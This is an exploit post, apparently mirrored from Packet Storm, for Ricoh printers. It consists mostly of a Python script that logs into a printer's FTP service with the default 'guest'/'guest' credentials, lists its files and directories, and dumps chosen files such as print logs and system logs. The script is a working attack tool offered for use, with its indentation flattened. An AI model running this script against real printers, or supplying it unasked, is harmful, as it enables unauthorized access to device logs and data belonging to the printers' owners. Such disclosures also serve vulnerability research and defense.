Ricoh Printer Directory / File Exposure
2024-2-2 23:37:18 Author: packetstormsecurity.com(查看原文) 阅读量:7 收藏

#Exploit Title: Ricoh Printer Directory and File Exposure 
#Date: 9/15/2023
#Exploit Author: Thomas Heverin (Heverin Hacker)
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
#Version: Ricoh Printers - All Versions
#Tested on: Windows
#CVE: N/A

#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)

from ftplib import FTP

def ftp_connect(ip):
try:
ftp = FTP(ip)
ftp.login("guest", "guest")
print(f"Connected to {ip} over FTP as 'guest'")
return ftp
except Exception as e:
print(f"Failed to connect to {ip} over FTP: {e}")
return None

if __name__ == "__main__":
target_ip = input("Enter the Ricoh Printer IP address: ")

ftp_connection = ftp_connect(target_ip)
if ftp_connection:
try:
while True:
file_list = ftp_connection.nlst()
print("List of Ricoh printer files and directories:")
for index, item in enumerate(file_list, start=1):
print(f"{index}. {item}")

file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
if file_index < 0:
break

if 0 <= file_index < len(file_list):
selected_file = file_list[file_index]
lines = []
ftp_connection.retrlines("RETR " + selected_file, lines.append)
print(f"Contents of '{selected_file}':")
for line in lines:
print(line)
else:
print("Invalid file index.")
except Exception as e:
print(f"Failed to perform operation: {e}")
finally:
ftp_connection.quit()


文章来源: https://packetstormsecurity.com/files/176961/ricohprinter-disclose.txt
如有侵权请联系:admin#unsafe.sh